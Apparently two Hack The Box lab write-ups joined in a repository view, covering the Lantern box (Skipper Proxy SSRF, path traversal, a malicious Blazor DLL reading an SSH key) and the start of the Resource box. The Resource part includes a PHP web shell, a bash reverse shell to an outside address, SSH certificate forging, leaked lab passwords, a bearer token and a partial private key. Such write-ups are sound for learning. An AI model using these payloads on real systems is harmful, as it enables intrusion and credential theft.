Discovered open port 80/tcp on 10.10.11.29
Discovered open port 22/tcp on 10.10.11.29
Discovered open port 3000/tcp on 10.10.11.29
Completed SYN Stealth Scan at 13:25, 13.43s elapsed (65535 total ports)
Nmap scan report for 10.10.11.29
Host is up, received echo-reply ttl 63 (0.17s latency).
Scanned at 2024-08-20 13:25:24 EDT for 13s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
3000/tcp open ppp syn-ack ttl 63
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)
|_ 256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)
80/tcp open http Skipper Proxy
|_http-title: Did not follow redirect to http://lantern.htb/
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Length: 207
| Content-Type: text/html; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:17 GMT
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Length: 225
| Content-Type: text/html; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:11 GMT
| Location: http://lantern.htb/
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS, HEAD
| Content-Length: 0
| Content-Type: text/html; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:11 GMT
|_ Server: Skipper Proxy
|_http-server-header: Skipper Proxy
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 500 Internal Server Error
| Connection: close
| Content-Type: text/plain; charset=utf-8
| Date: Tue, 20 Aug 2024 17:26:16 GMT
| Server: Kestrel
| System.UriFormatException: Invalid URI: The hostname could not be parsed.
| System.Uri.CreateThis(String uri, Boolean dontEscape, UriKind uriKind, UriCreationOptions& creationOptions)
| System.Uri..ctor(String uriString, UriKind uriKind)
| Microsoft.AspNetCore.Components.NavigationManager.set_BaseUri(String value)
| Microsoft.AspNetCore.Components.NavigationManager.Initialize(String baseUri, String uri)
| Microsoft.AspNetCore.Components.Server.Circuits.RemoteNavigationManager.Initialize(String baseUri, String uri)
| Microsoft.AspNetCore.Mvc.ViewFeatures.StaticComponentRenderer.<InitializeStandardComponentServicesAsync>g__InitializeCore|5_0(HttpContext httpContext)
| Microsoft.AspNetCore.Mvc.ViewFeatures.StaticC
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:21 GMT
| Server: Kestrel
| Help:
| HTTP/1.1 400 Bad Request
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:16 GMT
| Server: Kestrel
| RTSPRequest:
| HTTP/1.1 505 HTTP Version Not Supported
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:22 GMT
| Server: Kestrel
| SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Length: 0
| Connection: close
| Date: Tue, 20 Aug 2024 17:26:38 GMT
|_ Server: Kestrel
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
```
It is using an Ubuntu Jammy
![Image](../assets/img/post/Lantern/1.png)
**Web:**
At the bottom of the page, we find that we can upload a PDF file.
![Image](../assets/img/post/Lantern/2.png)
![Image](../assets/img/post/Lantern/3.png)
Web port 3000
Through port 3000, we have another page but for administrators
![Image](../assets/img/post/Lantern/image.png)
The web page is using blazor framework
![Image](../assets/img/post/Lantern/image-1.png)
Looking what it is blazor framework
![Image](../assets/img/post/Lantern/image-2.png)
http://lantern.htb:3000/Error
![Image](../assets/img/post/Lantern/image-3.png)
```bash
feroxbuster -u http://lantern.htb/
```
![Image](../assets/img/post/Lantern/image-4.png)
## CVE-2022-38580
https://www.exploit-db.com/exploits/51111
[CVE-2022-38580](https://www.exploit-db.com/exploits/51111).
![Image](../assets/img/post/Lantern/image-5.png)
Skipper Proxy is an open-source HTTP proxy designed to manage and route web traffic.
![alt text](../assets/img/post/Lantern/image-6.png)
## SSRF | Skipper Proxy
X-Skipper-Proxy: http://127.0.0.1:5000/
X-Skipper-Proxy: http://127.0.0.1:3000/
![alt text](../assets/img/post/Lantern/image-7.png)
We will target internal ports and see if we can get a response (200 OK).
![alt text](../assets/img/post/Lantern/image-8.png)
### EndPoints
```js
<script type="text/javascript">
(function (l) {
if (l.search[1] === '/') {
var decoded = l.search.slice(1).split('&').map(function (s) {
return s.replace(/~and~/g, '&')
}).join('?');
window.history.replaceState(null, null,
l.pathname.slice(0, -1) + decoded + l.hash
);
}
}(window.location))
</script>
<script>
var path = window.location.pathname.split('/');
var base = document.getElementsByTagName('base')[0];
if (window.location.host.includes('localhost')) {
base.setAttribute('href', '/');
} else if (path.length > 2) {
base.setAttribute('href', '/' + path[1] + '/');
} else if (path[path.length - 1].length != 0) {
window.location.replace(window.location.origin + window.location.pathname + '/' + window.location.search);
}
</script>
<link href="css/bootstrap/bootstrap.min.css" rel="stylesheet" />
<link href="css/app.css" rel="stylesheet" />
</head>
<body>
<div id="app">Loading...</div>
<div id="blazor-error-ui">
An unhandled error has occurred.
<a href="" class="reload">Reload</a>
<a class="dismiss">🗙</a>
</div>
<script src="_framework/blazor.webassembly.js"></script>
```
## Blazor Framework
```bash
<!--Blazor:{"sequence":1,"type":"server","prerenderId":"e8257d9551ad40e1a7ccdf4c47a26283","descriptor":"CfDJ8BUo1ePf0MxMocV2v0oTDZEwgRKevFE9FDWFo3Hoh\u002Bctlq06n97j8wSmwAUYH1IF2HZuCK6\u002BshII3spoGgE5IVxEDTXiVB\u002BA1rBDo\u002B8BB\u002B12\u002BjL7EcO6jaHC0CDRCckmtRhk5y\u002B/UK9iXSszEyylLY/js/yeVqNQSWhUXxJZmvUbQVjHPH3/905RVhci7a2y4a5p6zdP8MnwgxhVUSCDZsGEFFQnAF7D\u002BPKVcJMyo0qmeC0RXolHvW/77/evOaDqem\u002BygXua99Tey8h2f4LP7JV3Uum8bhtDhtCfnR\u002BLda\u002B9y3Ok5cyDR5vejvy7nuj5xJUdqTFZ0Lk7P42TVHR0Sb8FldpOkFzXJPeBfWy7LJPqEbtIH06HtukzxeYWChVm8c/Mm\u002BwoVm/KsoZ9MAKCPiDq6Q4uPEW1xeOpJ8cQOYh9"}--><!--Blazor:{"prerenderId":"e8257d9551ad40e1a7ccdf4c47a26283"}-->
```
Here we found another file interesting.
view-source:http://lantern.htb:3000/_framework/
![Image](../assets/img/post/Lantern/image-10.png)
view-source:http://lantern.htb:3000/_framework/blazor.server.js
![Image](../assets/img/post/Lantern/image-9.png)
![Image](../assets/img/post/Lantern/image-11.png)
```bash
GET /_framework/blazor.server.js HTTP/1.1
Host: lantern.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Skipper-Proxy: http://127.0.0.1:3000
Referer: http://lantern.htb/vacancies
Content-Type: multipart/form-data; boundary=---------------------------77018016341540896892659445340
Content-Length: 714
Origin: http://lantern.htb
Connection: keep-alive
```
We filter by the blazor word for know if there exist another file interesting.
![Image](../assets/img/post/Lantern/image-12.png)
I found 2 routes, of which blazor.boot.json contains paths to DLL files. We will try to access them and find something interesting.
`_framework/dotnet.wasm`
`_framework/blazor.boot.json`
![Image](../assets/img/post/Lantern/image-13.png)
## DLL
Radzen.Blazor.dll
InternaLantern.dll
![Image](../assets/img/post/Lantern/image-14.png)
```bash
GET /_framework/InternaLantern.dll HTTP/1.1
Host: lantern.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Skipper-Proxy: http://127.0.0.1:5000
Referer: http://lantern.htb/vacancies
Content-Type: multipart/form-data; boundary=---------------------------77018016341540896892659445340
Content-Length: 714
Origin: http://lantern.htb
Connection: keep-alive
```
For download the DLL's we can use curl:
```bash
curl -X GET "http://lantern.htb/_framework/InternaLantern.dll" -H "Host: lantern.htb" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" -H "X-Skipper-Proxy: http://127.0.0.1:5000" -H "Connection: close" --output internalantern.dll
```
And for decompile DLL's we can use:
**dnSpy** _Spoiler:_ We didn't get good results.
**dotPeek**
```bash
employee1.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("SGVhZCBvZiBzYWxlcyBkZXBhcnRtZW50LCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBqb2huLnNAZXhhbXBsZS5jb20="));
employee2.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("SFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGFubnkudEBleGFtcGxlLmNvbQ=="));
employee3.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("RnVsbFN0YWNrIGRldmVsb3BlciwgZW1lcmdlbmN5IGNvbnRhY3Q6ICs0NDEyMzQ1Njc4LCBlbWFpbDogY2F0aGVyaW5lLnJAZXhhbXBsZS5jb20="));
employee4.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("UFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGxhcmEuc0BleGFtcGxlLmNvbQ=="));
employee5.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("SnVuaW9yIC5ORVQgZGV2ZWxvcGVyLCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBsaWxhLnNAZXhhbXBsZS5jb20="));
employee6.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String("U3lzdGVtIGFkbWluaXN0cmF0b3IsIEZpcnN0IGRheTogMjEvMS8yMDI0LCBJbml0aWFsIGNyZWRlbnRpYWxzIGFkbWluOkFKYkZBX1FAOTI1cDlhcCMyMi4gQXNrIHRvIGNoYW5nZSBhZnRlciBmaXJzdCBsb2dpbiE="));
```
Decode the string in base64 (_echo "" | base64 -d)
- Head of sales department, emergency contact: +4412345678, email: john.s@example.com
- HR, emergency contact: +4412345678, email: anny.t@example.com
- FullStack developer, emergency contact: +4412345678, email: catherine.r@example.com
- PR, emergency contact: +4412345678, email: lara.s@example.com
- PR, emergency contact: +4412345678, email: lara.s@example.com
- System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22 Ask to change after first login!
Login lantern.htb:3000 with the credentials `admin:AJbFA_Q@925p9ap#22`
![Image](../assets/img/post/Lantern/image-15.png)
There is a section where we can upload DLL files; at this point, what comes to mind is a potential RCE.
![Image](../assets/img/post/Lantern/image-16.png)
![Image](../assets/img/post/Lantern/image-17.png)
File Disclosure Vulnerability
![Image](../assets/img/post/Lantern/image-18.png)
![Image](../assets/img/post/Lantern/image-19.png)
## LFI
![Image](../assets/img/post/Lantern/image-20.png)
```bash
http://lantern.htb/PrivacyAndPolicy?lang=../../../../etc/resolv&ext=conf
```
![Image](../assets/img/post/Lantern/image-21.png)
http://lantern.htb/PrivacyAndPolicy?lang=../../../../&ext=./etc/passwd
![Image](../assets/img/post/Lantern/image-22.png)
**User:** `tomas`
## RCE | Insecure Deserialization | Blazor
Now we will intercept the request to see how it is sent to the server behind the scenes
![Image](../assets/img/post/Lantern/image-28.png)
It seems we can see the serialized information in JSON; to read it, we need to deserialize it. For that, we will use an extension in BurpSuite called BPB.
![Image](../assets/img/post/Lantern/image-23.png)
![Image](../assets/img/post/Lantern/image-24.png)
We need to upload a DLL file and see what we can do with the deserialized data. Once we upload the file and deserialize it, we can see that we can insert the name of our file in the path to execute it.
### Deserialize
![Image](../assets/img/post/Lantern/image-25.png)
### Serialize
![Image](../assets/img/post/Lantern/image-26.png)
Below you can see that can execute the test.dll file.
![Image](../assets/img/post/Lantern/image-27.png)
Now we a create and charge our dll file for show the id_rsa from user tomas.
```bash
sudo apt install dotnet-sdk-6.0
mkdir xpl_project && \
cd xpl_project && \
dotnet new classlib -n xpl
```
```powershell
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;
namespace xpl
{
public class Component : ComponentBase
{
protected override void BuildRenderTree(RenderTreeBuilder builder)
{
base.BuildRenderTree(builder);
// Read private SSH key of user tomas
string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");
builder.AddContent(0, file);
}
}
}
```
```bash
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0 && \
dotnet add package Microsoft.AspNetCore.Components.Web --version 6.0.0
dotnet build -c release
We will find the xpl.dll file under path /xpl_project/xpl/bin/release/net6.0.
```
**We got the id_rsa:**
![Image](../assets/img/post/Lantern/image-29.png)
```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```
`/var/mail$ cat tomas`
![Image](../assets/img/post/Lantern/image-30.png)
`sudo -l`
![Image](../assets/img/post/Lantern/image-31.png)
## Procmon
**-p/--pids:** This option allows us to specify a list of Process IDs (PIDs) that we want to monitor. We can provide multiple PIDs by separating them with commas.
**-e/--events:** With this option, we can specify which system calls or events you want to monitor. Like the PIDs, these events can also be provided as a comma-separated list.
**-c/--collect [FILEPATH]:** This option starts procmon in headless mode, meaning it will run without a user interface and will collect data directly into a specified file. This is useful for automated or script-based monitoring.
**-f/--file FILEPATH:** This option allows us to open an existing procmon trace file. Its useful when we want to analyze previously collected data rather than monitoring processes in real time.
![Image](../assets/img/post/Lantern/proc1.png)
`run command: `ps -aux` | `ps -aux | grep automation` for to display information about the currently running processes.`
![Image](../assets/img/post/Lantern/proc2.png)
Now we can see the write operations performed by the process with the follow command:
`sudo /usr/bin/procmon -p [PID] -e write`
Wait for a few minutes, long enough for the program to write sufficient data, Press F6 to export logs and F9 to exit:
![Image](../assets/img/post/Lantern/proc3.png)
![Image](../assets/img/post/Lantern/proc4.png)
**Download db:**
```bash
scp -i id_rsa tomas@lantern.htb:/home/tomas/procmon_2024-
08-23_00:50:02.db lantern.db
```
Open db with Sqlite3:
`.tables`
`SELECT * FROM ebpf;`
![Image](../assets/img/post/Lantern/proc5.png)
`.output out.txt`
`SELECT hex(substr(arguments, 9, resultcode)) FROM ebpf WHERE resultcode > 0 ORDER BY timestamp;`
**Hexadecimal format**
[CyberChef](https://gchq.github.io/CyberChef/)
![Image](../assets/img/post/Lantern/proc6.png)
Or use this script for decode the hexadecimal format:
```python
import binascii
# Read the content from out.txt
with open('out.txt', 'r') as file:
hex_data = file.read().strip().replace('\n', '')
# Convert hex data to binary
binary_data = binascii.unhexlify(hex_data)
# Decode the binary data to a string
try:
decoded_string = binary_data.decode('utf-8', errors='replace')
except UnicodeDecodeError:
decoded_string = binary_data.decode('latin1', errors='replace')
print("Decoded Data:\n")
print(decoded_string)
```
![Image](../assets/img/post/Lantern/proc7.png)
We need to delete the duplicate letters.
![Image](../assets/img/post/Lantern/proc8.png)
![Image](../assets/img/post/Lantern/proc9.png)
Pwned!!
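Review bot: The front matter of this post categorises it under the wrong box, `categories: [hackthebox , Compiled]`; it should be `[hackthebox, Lantern]`, matching the title and the `image.path`. The decoded employee list is also wrong in one entry: the fifth bullet repeats "PR, emergency contact: +4412345678, email: lara.s@example.com", but the fifth base64 string in the dotPeek snippet starts `SnVuaW9yIC5ORVQgZGV2ZWxvcGVy`, which decodes to "Junior .NET developer, ..." (the lila.s entry), so the duplicate should be replaced with that line. In the RCE section the C# component is fenced as `powershell` and should be `csharp`, and the build block mixes commands with prose: "We will find the xpl.dll file under path /xpl_project/xpl/bin/release/net6.0." sits inside the bash fence and should be moved out of it. Finally, every image in this post uses a relative `../assets/img/post/Lantern/...` path, while the Compiled post and this post's own `image.path` use root-relative `/assets/...`; a relative URL resolves against the post's permalink, so these should be changed to `/assets/img/post/Lantern/...` to render reliably.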

File diff suppressed because it is too large Load Diff


@ -0,0 +1,472 @@
---
title: HTB - Resource
date: 2024-08-23 00:00:00 +8000
categories: [hackthebox ]
tags: [HackTheBox, LFI, RCE, Lateral Movement]
image:
path: /assets/img/post/resource/Resource.png
lqip: 
alt: Hack the Box - Resource.
---
## Box Info
| Name | Resource |
| :-------------------- | ---------------: |
| Release Date | 3 Sep, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
# Enumeration Exposed Services
ping -c 3 10.10.11.27
![Image](../assets/img/post/resource/image.png)
target OS : Linux
## Nmap
```bash
sudo nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.27 -oG allports
```
```bash
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 17:44 EDT
Initiating SYN Stealth Scan at 17:44
Scanning 10.10.11.27 [65535 ports]
Discovered open port 80/tcp on 10.10.11.27
Discovered open port 22/tcp on 10.10.11.27
Discovered open port 2222/tcp on 10.10.11.27
Completed SYN Stealth Scan at 17:44, 13.29s elapsed (65535 total ports)
Nmap scan report for 10.10.11.27
Host is up, received user-set (0.15s latency).
Scanned at 2024-09-17 17:44:44 EDT for 13s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 63
2222/tcp open EtherNetIP-1 syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds
Raw packets sent: 65595 (2.886MB) | Rcvd: 65595 (2.624MB
nmap -sCV -p 22,80,2222 10.10.11.27 -oN targeted
# Nmap 7.94SVN scan initiated Tue Sep 17 17:45:51 2024 as: nmap -sCV -p 22,80,2222 -oN targeted 10.10.11.27
Nmap scan report for 10.10.11.27 (10.10.11.27)
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA)
|_ 256 e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
**Host file:**
```bash
echo "10.10.11.27 itrc.ssh.htb" | sudo tee /etc/hosts
10.10.11.27 itrc.ssh.htb
```
# Enumeration Of Web Services
**Whatweb:**
![Image](../assets/img/post/resource/image-1.png)
**php 8.1.29 version**
**Web:**
![Image](../assets/img/post/resource/image-2.png)
**Register and login**
![Image](../assets/img/post/resource/image-3.png)
When i create a empty file with extension zip and upload, display a error.
![Image](../assets/img/post/resource/image-4.png)
## Parameter Enumerartion
```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://itrc.ssg.htb/index.php?page=FUZZ' -fs 3120
```
![Image](../assets/img/post/resource/image-5.png)
![Image](../assets/img/post/resource/image-6.png)
Possible user?
`zzinter`
![Image](../assets/img/post/resource/image-7.png)
## LFI - Local File Inclusion
Back to the error that we got upload empty file.
```bash
**Deprecated**: ZipArchive::open(): Using empty file as ZipArchive is deprecated in **/var/www/itrc/savefile.inc.php** on line **38**
**Warning**: hash_file(/tmp/phpXqBGtj): Failed to open stream: No such file or directory in **/var/www/itrc/savefile.inc.php** on line **48**
**Warning**: Cannot modify header information - headers already sent by (output started at /var/www/itrc/savefile.inc.php:38) in **/var/www/itrc/api/create_ticket.php** on line **31**
```
- ZipArchive::open()
- hash_file
# Identification and exploitation of vulnerabilities
`/var/www/itrc/api/create_ticket.php`
```bash
http://itrc.ssg.htb/?page=/var/www/itrc/api/create_ticket
```
[wrappers](https://www.php.net/manual/en/wrappers.phar.php)
[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#phar-archive-structure)
https://www.php.net/manual/en/context.phar.php
```php
<?php
system($_GET['cmd']);
__HALT_COMPILER();
?>
```
zip the file.php and upload
```bash
http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell
```
![Image](../assets/img/post/resource/image-8.png)
```bash
http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell&cmd=whoami
```
![Image](../assets/img/post/resource/image-9.png)
## RCE | Remote Code Execution
Now we can execute remote code for get a reverse shell.
**Encode to url with burpsuite**
`bash -c 'bash -i >& /dev/tcp/10.10.16.50/9090 0>&1'`
```bash
http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell&cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.16.50/9090+0%3E%261%27
```
```bash
rlwrap nc -nlvp 9090
```
![Image](../assets/img/post/resource/image-10.png)
We have a 2 users:
```
msainristil:x:1000:1000::/home/msainristil:/bin/bash
zzinter:x:1001:1001::/home/zzinter:/bin/bash
```
```
$dsn = "mysql:host=db;dbname=resourcecenter;";
$dbusername = "jj";
$dbpassword = "ugEG5rR5SG8uPd";
$pdo = new PDO($dsn, $dbusername, $dbpassword);
```
`cat itrc.ssg.htb.har | grep msainristil`
![Image](../assets/img/post/resource/image-11.png)
```bash
text": "user=msainristil&pass=82yards2closeit",
"value": "msainristil"
```
```bash
ssh msainristil@itrc.ssg.htb
```
![Image](../assets/img/post/resource/image-12.png)
We found a 2 files in decomission_old_ca
## Lateral Movement | Zzinter itrc
The main purpose of ca-itrc and ca-itrc.pub is to sign public keys of other users, thereby generating certificates that validate the identity of users. This allows for secure authentication in systems that trust the certificate authority (CA).
![Image](../assets/img/post/resource/image-13.png)
1. Create a new key
```ssh
ssh-keygen -t rsa -b 2048 -f racc0x
```
2. Sign the public key with the CA's private key
```ssh
ssh-keygen -s ca-itrc -I ca-itrc.pub -n zzinter racc0x.pub
```
3. Verify the certificate
```ssh
ssh-keygen -Lf racc0x-cert.pub
```
4. Login in the host as zzinter
```ssh
ssh -o CertificateFile=racc0x-cert.pub -i racc0x zzinter@localhost
```
![Image](../assets/img/post/resource/image-14.png)
## Lateral Movement | Root itrc
We can do the same procces for root
```bash
ssh-keygen -t rsa -b 2048 -f root
ssh-keygen -s ca-itrc -I ca-itrc.pub -n root root.pub
ssh -o CertificateFile=root-cert.pub -i root root@localhost
```
![Image](../assets/img/post/resource/image-15.png)
We found as zzinter a code
`sign_key_api.sh`
```bash
#!/bin/bash
usage () {
echo "Usage: $0 <public_key_file> <username> <principal>"
exit 1
}
if [ "$#" -ne 3 ]; then
usage
fi
public_key_file="$1"
username="$2"
principal_str="$3"
supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
if ! echo "$supported_principals" | grep -qw "$word"; then
echo "Error: '$word' is not a supported principal."
echo "Choose from:"
echo " webserver - external web servers - webadmin user"
echo " analytics - analytics team databases - analytics user"
echo " support - IT support server - support user"
echo " security - SOC servers - support user"
echo
usage
fi
done
if [ ! -f "$public_key_file" ]; then
echo "Error: Public key file '$public_key_file' not found."
usage
fi
public_key=$(cat $public_key_file)
curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"
```
## Lateral Movement | Support ssg
Repeat the proccess
`ssh-keygen -t rsa -d 2048 -f support`
`chmod 600 support`
```bash
bash ./sign_key_api.sh support.pub support support
```
```bash
echo " ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgVTxuoP/banVH1XRmI9muNjrcQ05tY2m5rr+eqqLjVtcAAAADAQABAAABAQDDlPBIRX6jnGGizXf5Ps+iovHfkVbWE51/d6mpN4O8Z6M0GPsGGe6hJ30FIPFby47HeShIdidUd572ZlBeBr6woRxXI242UFjw1VGDhZMYSoH8QAC5oYtoS/vSWNiTETBCTkL20ddU2bUUmMhxg3JLhNue6NcUwgJOz2tCQcsRC41b8RkuH7JrPc19R8lsYPHwUGaK+ridimuHL2QsusB5KxsfHvr4gVud7TT1YHvy0nYa2DGM6GsJ7oN4/Jt4lcFLFs+tpiRFsPOMTk+9RbMmsUjk/mTCwMlys7sXVrl9pIERISrXEmQe89+X2Tl/k0Wr0vTOaLkHNLMWYZ6+AD+jAAAAAAAAACgAAAABAAAAB3N1cHBvcnQAAAALAAAAB3N1cHBvcnQAAAAAZuE5o///////////AAAAAAAAAIIAAAAVcGVybWl0LVgxMS1mb3J3YXJkaW5nAAAAAAAAABdwZXJtaXQtYWdlbnQtZm9yd2FyZGluZwAAAAAAAAAWcGVybWl0LXBvcnQtZm9yd2FyZGluZwAAAAAAAAAKcGVybWl0LXB0eQAAAAAAAAAOcGVybWl0LXVzZXItcmMAAAAAAAAAAAAAADMAAAALc3NoLWVkMjU1MTkAAAAggeDwK53LVKHJh+rMLcA2WABxbtDgyhm57MATyY0VKbEAAABTAAAAC3NzaC1lZDI1NTE5AAAAQBRXvjDs2DgTA2aM3eMElVZrECn5Nh/1gycQhDkSaAVXEA5u6c2hAlOiQFJtLTYY+mLdafmv5MooQh92AdgrjQY= zzinter@itrc" > racc0x
```
```bash
ssh -i support -p 2222 -o CertificateFile=racc0x support@172.223.0.1
```
![Image](../assets/img/post/resource/image-16.png)
![Image](../assets/img/post/resource/image-17.png)
## Lateral Movement | Zzinter ssg
We go to do the same proccess
`ssh-keygen -t rsa -b 2048 -f zzinter`
```bash
echo "ssh-rsa-cert-v01@openssh.com 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 zzinter@itrc" > raccox
```
`chmod 600 raccox`
`chmod 600 zzinter`
```bash
ssh -p 2222 -i zzinter -o CertificateFile=raccox zzinter@172.223.0.1
```
![Image](../assets/img/post/resource/image-18.png)
![Image](../assets/img/post/resource/image-19.png)
`Sudo -l`
![Image](../assets/img/post/resource/image-20.png)
This is the same process as with `sign_key_api.sh`.
- sign_key.sh
```python
#!/bin/bash
usage () {
echo "Usage: $0 <ca_file> <public_key_file> <username> <principal> <serial>"
exit 1
}
if [ "$#" -ne 5 ]; then
usage
fi
ca_file="$1"
public_key_file="$2"
username="$3"
principal_str="$4"
serial="$5"
if [ ! -f "$ca_file" ]; then
echo "Error: CA file '$ca_file' not found."
usage
fi
itca=$(cat /etc/ssh/ca-it)
ca=$(cat "$ca_file")
if [[ $itca == $ca ]]; then
echo "Error: Use API for signing with this CA."
usage
fi
if [ ! -f "$public_key_file" ]; then
echo "Error: Public key file '$public_key_file' not found."
usage
fi
supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
if ! echo "$supported_principals" | grep -qw "$word"; then
echo "Error: '$word' is not a supported principal."
echo "Choose from:"
echo " webserver - external web servers - webadmin user"
echo " analytics - analytics team databases - analytics user"
echo " support - IT support server - support user"
echo " security - SOC servers - support user"
echo
usage
fi
done
if ! [[ $serial =~ ^[0-9]+$ ]]; then
echo "Error: '$serial' is not a number."
usage
fi
ssh-keygen -s "$ca_file" -z "$serial" -I "$username" -V -1w:forever -n "$principal" "$public_key_file"
```
## Lateral Movement | Root ssg
```python
import string
import subprocess
s = string.ascii_letters+'+'+ '-' + '\n' + ' '+ '/' + '=' + string.digits
strlist = '-'
while True:
for i in s:
listres = i + strlist
listtemp = '*' + listres
with open('testca', 'w') as f:
f.write(listtemp)
a=subprocess.run(f'sudo /opt/sign_key.sh ./testca test.pub root root_user 1', shell=True, stdout=subprocess.PIPE, text=True)
if 'Use API for signing with this CA' in a.stdout:
strlist = listres
print(strlist)
break
```
`ca.key`
```
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAKg7BlysOwZc
rAAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQ
